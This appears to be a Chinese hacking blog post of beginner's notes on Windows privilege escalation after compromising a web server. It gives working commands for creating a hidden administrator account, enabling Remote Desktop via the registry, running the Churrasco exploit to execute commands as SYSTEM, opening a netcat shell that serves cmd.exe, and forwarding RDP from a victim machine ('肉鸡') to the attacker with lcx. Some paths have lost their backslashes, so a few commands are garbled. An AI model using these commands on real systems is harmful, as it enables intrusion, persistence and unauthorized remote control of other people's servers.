0x00 小菜今天学习了一些windows下的提权,分享一下,以后也方便查看,也请大牛指教
0x01 cmd基本命令(这乃安全工程师必备,如果你不知道,百度google你值得拥有)
net start telnet 开telnet服务(开启服务 service start XX)
net user 查看所有用户列表
net user hack123 hack123 /add 添加用户hack123密码为hack123
net localgroup administrators hack123 /add 将帐号hack123升级为管理员
开3389
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
0x02 巴西烤肉 简单介绍一下,主要是服务器支持wscript组建,如果不支持就考虑别的方法吧,毕竟那啥,姿势还是要对,不对换一种呗,说一下利用,先上传一个cmd,然后上传巴西烤肉
执行 XXXXXX Churrasco.exe "net user hack123 hack123 /add && net localgroup administrators hack123 /add" (XXX是路径)
XXXXXX Churrasco.exe "net user admin$ /del" 删除帐号
query user 查看会话
logoff ID号 踢掉
XXXXXX Churrasco.exe "logoff 1"
0x03 NC反弹
路径
c.exe -l -p 端口 -t -e 路径cmd.exe
XXXXXX
c.exe -l -p 1234 -t -e c:RECYCLERcmd.exe
NC上传
DOS界面下运行:
NC -vv url 80<1.txt
-vv: 回显
80: web端口
1.txt: 就是你要发送的数据包
0x04 LCX端口转发
先本地监听X端口 lcx.exe -listen X 3389
c:
ecyclerlcx.exe -slave 自己的ip X 肉鸡IP 3389 LCX转发
c:
ecyclerlcx.exe -slave 202.134.12.12 X 123.123.4.4 3389